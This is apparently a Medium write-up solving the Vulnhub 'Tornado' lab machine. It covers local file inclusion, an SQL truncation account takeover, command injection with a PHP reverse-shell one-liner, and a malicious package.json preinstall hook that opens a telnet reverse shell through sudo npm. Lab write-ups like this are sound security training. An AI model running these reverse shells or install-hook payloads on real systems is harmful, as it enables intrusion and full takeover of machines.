Difficulty: Medium

NMAP:

Nice port 22 and port 80 is opened , let’s browse.

Nothing here, enumerate more! And brute-force directory!

DIRSEARCH:

We found directory /bluesky but nothing interesting here! Again enumeration!

I just switched to gobuster just for use other tool :)

We found something interesting like /signup.php and /login.php , so let’s signup with random credentials!

We are in!
Now go in /login.php and enter with your credentials!

LFI ? YES! but i found other interesting like “contact” just see

So now let’s go for LFI!

Local File Inclusion:

is different from the usual LFI here I had to understand what it meant, because opening the source code, I found this.

But the classic ../../../../etc/passwd doesn’t work ! So.. i tryied another method and it really work! Just a different alias.

~tornado/imp.txt was the LFI ! Let’s go
Now we have some mail! but if we go to signup.php we notice that actually they are all registered. Here I got stuck, until I found a vulnerability thanks to inspect element.

SQL Truncation Attack:

If we go to /signup.php and inspect the element we find something strange.

Maximum length “13”? It seems strange so I found this CVE, SQL Truncation attack, we can access by changing the email length parameter, put the emails we found with the LFI, and adding our email that was already registered before, in this case the system thinks that I am logging in with my account “jin@jin.com” but in reality it is not !!! Because we will be able to enter with all the other users!

Modify at 33 or what you want! Now we need to find the user that can be use “contact” and i found it!

Get N0t0d4y’s stories in your inbox

Join Medium for free to get updates from this writer.

adding the target email and ours at the end, with our credentials the system thinks that I am entering, while in reality it will let me in with jacob!

Now access with jacob in /login.php and finally we have the “contact” unblocked!

Command Injection:

Now we can try to write our payload for obtain the reverse shell! i try with this payload: php -r ‘$sock=fsockopen(“192.168.1.2”,4545);exec(“/bin/sh -i <&3 >&3 2>&3”);’
and we are IN!

Horizontal Privilege Escalation:

Type sudo -l

Now go in /tmp and create a folder “jin” mkdir jin! Go in your shell and create a package.json file with this code:
{
“name”: “jin”,
“version”: “1.0.0”,
“description”: “follow jin on medium and twitter“,
“main”: “index.js”,
“scripts”: {
“preinstall”: “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 192.168.1.110 9002 > /tmp/f”
}
}
Now transfer this file in /tmp , command in your shell: python -m http.server 8000 and take this file with wget!

Now mv package.json jin
and chmod +s jin/

Listen on port 9002 and type :
sudo -u catchme /usr/bin/npm i /tmp/jin — unsafe

Final Step!

The is the flag user.txt take it! After there is a python script! enc.py

With and hash encrypted! Similar to ROT13. I just go in this link: https://www.boxentriq.com/code-breaking/caesar-cipher
And put the hash encrypted!

Press auto Solve! And i got this !

But this is in real is not the password so , i’m not solve this! But if you think about it for a moment you just need to understand what the password is! Just read and formulate it well.

WE ARE ROOT!
I hope this is useful! Follow me on twitter too @0xJin

-0xJin

IA: Tornado Vulnhub Writeup

NMAP:

DIRSEARCH:

Local File Inclusion:

SQL Truncation Attack:

Get N0t0d4y’s stories in your inbox

Command Injection:

Horizontal Privilege Escalation:

Final Step!